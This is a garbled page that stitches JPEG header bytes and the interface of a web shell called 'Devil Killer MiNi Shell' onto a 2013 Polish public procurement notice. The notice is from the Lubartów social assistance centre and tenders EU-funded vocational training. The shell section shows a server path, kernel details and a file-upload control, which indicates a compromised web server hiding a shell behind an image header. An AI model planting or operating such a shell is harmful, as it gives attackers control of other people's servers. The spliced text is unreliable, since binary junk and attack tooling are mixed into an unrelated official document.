JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/213712-N-2013.html

<p class="kh_header"><b>Lubartów: Organizacja i przeprowadzenie szkoleń oraz zajęć z zakresu aktywnej integracji, realizowanych przez Gminny Ośrodek Pomocy Społecznej w Lubartowie w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów</b><br>
<b>Numer ogłoszenia: 213712 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. Lubelska 18A, 21-100 Lubartów, woj. lubelskie, tel. 81 8552013, faks 81 8545910.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gopslubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń oraz zajęć z zakresu aktywnej integracji, realizowanych przez Gminny Ośrodek Pomocy Społecznej w Lubartowie w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń zawodowych, zajęć z zakresu doradztwa zawodowego i treningu kompetencji i umiejętności społecznych, zgodnie z poniższym opisem oraz opisem zawartym w SIWZ. 
Zamówienie realizowane jest w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. 
Zamówienie realizowane będzie poprzez różne formy wsparcia (szkolenia, kursy, trening, doradztwo), w zakresach tematycznych, stanowiących cztery odrębne części zamówienia: 
I. Część I - Kursy i szkolenia zawodowe - gr.1: 
1. Sprzedawca/czyni z obsługą kasy fiskalnej i komputera (+minimum sanitarne)- 3 osoby, 150 godz./os. Miejsce realizacji: miasto Lubartów;
2. Wizaż i kosmetologia - 2 osoby, 170 godzin/os. Miejsce realizacji: miasto Lubartów; 
3. Opiekun/ka osób starszych, niepełnosprawnych i dzieci - 3 osoby, 170 godzin/os. Miejsce realizacji: zaj. teor. - Miasto Lubartów, zaj. prakt. - Miasto Lubartów i/lub Gmina Lubartów; 
4. Florystyka-bukieciarstwo z elementami dekoratorstwa - 5 osób, 130 godz./os. Miejsce realizacji: miasto Lubartów;
5. Pracownik administracyjno-biurowy (+ obsługa maszyn liczących) - 4 osoby, 150 godz./os. Miejsce realizacji: miasto Lubartów;
6. Magazynier z obsługą wózków widłowych (jezdniowych) podnośnikowych z napędem silnikowym - 3 osoby, 100 godz. dyd./os. Miejsce realizacji: miasto Lubartów;
7. Pracownik remontowo-budowlany - roboty wykończeniowe - 1 os., 200 godz./os. Miejsce realizacji: zajęcia teoretyczne: Miasto Lubartów, zajęcia praktyczne: Miasto Lubartów, i/lub Miasto Lublin i/lub okolice (max. do 50 km. od Lubartowa).
Termin realizacji całości cz. I - do 30.11.2013 z uwzględnieniem uszczegółowień terminu podanych poniżej: 
- dla kursu nr 5. - Pracownik administracyjno-biurowy (+ obsługa maszyn liczących) - termin realizacji max. do dn. 15.09.2013r.
- dla kursu nr 6 - Magazynier z obsługą wózków widłowych (jezdniowych) podnośnikowych z napędem silnikowym - termin realizacji max. do dn. 31.08.2013r.,
oraz z wzięciem pod uwagę/uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ.
II. Część II - Kursy i szkolenia zawodowe - gr.2: 
1.	Prawo jazdy kat. D - 2 os., 80 godz./os (po 20 godz. dydaktycznych teorii i 60 godz. zegarowych praktyki/os.). Miejsce realizacji: Zaj. teor. - Miasto Lubartów, zaj. prakt. - Miasto Lubartów i/lub Miasto Lublin
Termin realizacji cz. II - do 30.11.2013 z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ.
III. Część III - Kursy i szkolenia zawodowe - gr.3: 
1.	Spawacz MIG i MAG - 2 os., 260 godz./os. Miejsce realizacji: miasto Lubartów i/lub miasto Lublin.
Termin realizacji cz. III - do 30.11.2013 z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ.
IV. Część IV - Wsparcie z zakresu integracji zawodowej i społecznej: 
1. Zajęcia z doradcą zawodowym - 18 osób, 52 godziny (16 godz. zajęć grupowych, 36 godz. zajęć indywidualnych - po 2 godz. na każdego uczestnika). Miejsce realizacji: miasto Lubartów;
2. Trening kompetencji i umiejętności społecznych - 18 osób, 66 godzin (30 godz. zajęć grupowych, 36 godz. zajęć indywidualnych - po 2 godz. na każdego uczestnika). Miejsce realizacji: miasto Lubartów; 
Termin realizacji cz. IV - w ciągu 5 tygodni (35 dni) od dnia zawarcia umowy Zamawiającego z Wykonawcą z uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.57.00.00-0, 85.31.25.10-7, 85.31.23.20-8, 80.41.10.00-8, 80.41.12.00-0, 80.53.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że wykonał w ciągu ostatnich 3 lat od terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej po jednej usłudze szkolenia, którego przedmiotem było: 
W stosunku do 1 cz. zamówienia:
-  przyuczenie do zawodu sprzedawcy - dla min. 2 osób o wartości min. 10.000,00 PLN;
- wizaż i kosmetologia - dla min. 2 osób o wartości min. 3.000,00 PLN; 
- przyuczenie do zawodu opiekuna/ki osób zależnych - dla min. 2 osób o wartości min. 8.000,00 PLN;
- florystyka-bukieciarstwo - dla min. 4 osób o wartości min. 2.800,00 PLN;
- przyuczenie do obsługi administracyjno-biurowej - dla min. 3 os. o wartości min. 12.500,00 PLN;
- przyuczenie do zawodu magazyniera wraz z obsługą wózków widłowych dla min. 2 os. o wartości min. 5.000,00 PLN;
- przyuczenie do wykonywania prac remontowo-budowlanych dla min. 1 os. o wartości min. 3.000,00 PLN.
W stosunku do 2 cz. zamówienia:
- kurs prawa jazdy kat. D dla min. 1 os. o wartości min. 2.000,00 PLN
W stosunku do 3 cz. zamówienia:
- przyuczenie do spawania metodą MIG i MAG - dla min. 1 os. o wartości min. 4.000,00 PLN.
W stosunku do 4 cz. zamówienia:
- doradztwo zawodowe dla min. 16 os. o wartości min. 1.200,00 PLN;
- zajęcia z zakresu ćwiczenia kompetencji i umiejętności społecznych dla min. 16 os. o wartości min. 1.300,00 PLN.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, tj. osobami, które posiadają kwalifikacje zawodowe, doświadczenie zawodowe i wykształcenie niezbędne do realizacji zakresu szkoleń przedstawionych w przedmiocie zamówienia, a w szczególności co najmniej: 
W stosunku do I cz. zamówienia:
- 1 osobą zdolną do przeprowadzenia szkolenia Sprzedawca/czyni z obsługą kasy fiskalnej i komputera (+minimum sanitarne): z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Wizaż i kosmetologia: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Opiekun/ka osób starszych, niepełnosprawnych i dzieci: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Florystyka-bukieciarstwo z elementami dekoratorstwa: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Pracownik administracyjno-biurowy (+obsługa maszyn liczących): z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Magazynier z obsługą wózków widłowych (jezdniowych) podnośnikowych z napędem silnikowym: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce;

- 1 osobą zdolną do przeprowadzenia szkolenia Pracownik remontowo-budowlany - roboty wykończeniowe: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce.

W stosunku do II cz. zamówienia:
- 1 osobą zdolną do przeprowadzenia kursu Prawo jazdy kat. D: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce.

W stosunku do III cz. zamówienia:
- 1 osobą zdolną do przeprowadzenia szkolenia Spawacz MIG i MAG: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w prowadzeniu szkolenia o danej tematyce.

W stosunku do IV cz. zamówienia:
 - 1 osobą zdolną do przeprowadzenia Zajęć z doradcą zawodowym: z wykształceniem na poziomie minimum średnim, kwalifikacjami oraz doświadczeniem w zakresie doradztwa zawodowego;
- 1 osobą z wykształceniem co najmniej wyższym psychologicznym, zdolną do przeprowadzenia głównego bloku zajęć z psychologiem w ramach treningu kompetencji i umiejętności społecznych, posiadającą kwalifikacje i doświadczenie w prowadzeniu poradnictwa psychologicznego; 
- 1 osobą z wykształceniem co najmniej wyższym medycznym, zdolną do przeprowadzenia bloku z zakresu higieny i zdrowego stylu życia w ramach treningu kompetencji i umiejętności społecznych, posiadającą kwalifikacje i doświadczenie w zakresie poradnictwa zdrowotnego;
- 1 osobą z wykształceniem co najmniej wyższym, zdolną do przeprowadzenia bloku z zakresu kształtowania własnego wizerunku w ramach treningu kompetencji i umiejętności społecznych, posiadającą kwalifikacje i doświadczenie w prowadzeniu zajęć o danej tematyce.
Wymagania dotyczące kadry szkoleniowej musi spełniać każda osoba wskazana przez Wykonawcę w wykazie osób do realizacji konkretnego elementu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za usługi główne uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt 10.1.2 SIWZ oraz III.3.2 niniejszego ogłoszenia, t.j. wykażą się należytym wykonaniem w ciągu ostatnich 3 lat od terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej po jednej usłudze szkolenia, którego przedmiotem było:
W stosunku do 1 cz. zamówienia:
-  przyuczenie do zawodu sprzedawcy - dla min. 2 osób o wartości min. 10.000,00 PLN; 
- wizaż i kosmetologia - dla min. 2 osób o wartości min. 3.000,00 PLN;
- przyuczenie do zawodu opiekuna/ki osób zależnych - dla min. 2 osób o wartości min. 8.000,00 PLN;
- florystyka-bukieciarstwo - dla min. 4 osób o wartości min. 2.800,00 PLN;
- przyuczenie do obsługi administracyjno-biurowej - dla min. 3 os. o wartości min. 12.500,00 PLN;
- przyuczenie do zawodu magazyniera wraz z obsługą wózków widłowych dla min. 2 os. o wartości min. 5.000,00 PLN;
- przyuczenie do wykonywania prac remontowo-budowlanych dla min. 1 os. o wartości min. 3.000,00 PLN.
W stosunku do 2 cz. zamówienia:
- kurs prawa jazdy kat. D dla min. 1 os. o wartości min. 2.000,00 PLN.
W stosunku do 3 cz. zamówienia:
- przyuczenie do spawania metodą MIG i MAG - dla min. 1 os. o wartości min. 4.000,00 PLN.
W stosunku do 4 cz. zamówienia:
- doradztwo zawodowe dla min. 16 os. o wartości min. 1.200,00 PLN;
- zajęcia z zakresu ćwiczenia kompetencji i umiejętności społecznych dla min. 16 os. o wartości min. 1.300,00 PLN.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy stanowiący załącznik nr 1 do SIWZ (odpowiedni dla poszczególnych części zamówienia, o których udzielenie wykonawca się ubiega)- w przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną. 
2. Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo zamówień publicznych. 
3. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy lub wykonawca. 
4. W sytuacji, gdy wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
5. Oświadczenie o podwykonawcach - zgodnie z zał. nr 8 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopslubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Lubartowie, ul. Lubelska 18A, 21-100 Lubartów, woj. lubelskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 10:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Lubartowie, ul. Lubelska 18A, 21-100 Lubartów, woj. lubelskie, Pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Efektywna pomoc społeczna w Gminie Lubartów realizowany przez Gminny Ośrodek Pomocy Społecznej w Lubartowie jest projektem systemowym współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kursy i szkolenia zawodowe - gr. 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursów i szkoleń zawodowych w ramach projektu systemowego p.n. Efektywna pomoc społeczna w Gminie Lubartów zgodnie ze szczegółowym opisem zawartym w SIWZ. W skład tej części zamówienia wchodzą następujące kursy/szkolenia: 
1. Sprzedawca/czyni z obsługą kasy fiskalnej i komputera (+minimum sanitarne)- 3 osoby, 150 godz./os. Miejsce realizacji: miasto Lubartów;
2. Wizaż i kosmetologia - 2 osoby, 170 godzin/os. Miejsce realizacji: miasto Lubartów; 
3. Opiekun/ka osób starszych, niepełnosprawnych i dzieci - 3 osoby, 170 godzin/os. Miejsce realizacji: zaj. teor. - Miasto Lubartów, zaj. prakt. - Miasto Lubartów i/lub Gmina Lubartów; 
4. Florystyka-bukieciarstwo z elementami dekoratorstwa - 5 osób, 130 godz./os. Miejsce realizacji: miasto Lubartów;
5. Pracownik administracyjno-biurowy (+ obsługa maszyn liczących) - 4 osoby, 150 godz./os. Miejsce realizacji: miasto Lubartów;
6. Magazynier z obsługą wózków widłowych (jezdniowych) podnośnikowych z napędem silnikowym - 3 osoby, 100 godz. dyd./os. Miejsce realizacji: miasto Lubartów;
7. Pracownik remontowo-budowlany - roboty wykończeniowe - 1 os., 200 godz./os. Miejsce realizacji: zajęcia teoretyczne: Miasto Lubartów, zajęcia praktyczne: Miasto Lubartów, i/lub Miasto Lublin i/lub okolice (max. do 50 km. od Lubartowa).
Termin realizacji całości cz. I - do 30.11.2013 z uwzględnieniem uszczegółowień terminu podanych poniżej: 
- dla kursu nr 5. - Pracownik administracyjno-biurowy (+ obsługa maszyn liczących) - termin realizacji max. do dn. 15.09.2013r.
- dla kursu nr 6 - Magazynier z obsługą wózków widłowych (jezdniowych) podnośnikowych z napędem silnikowym - termin realizacji max. do dn. 31.08.2013r.,
oraz z wzięciem pod uwagę/uwzględnieniem preferencji Zamawiającego dot. kolejności przeprowadzania kursów w ramach całego zamówienia, zawartych w opisie przedmiotu zamówienia - pkt 3 oraz 9.5 SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.53.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
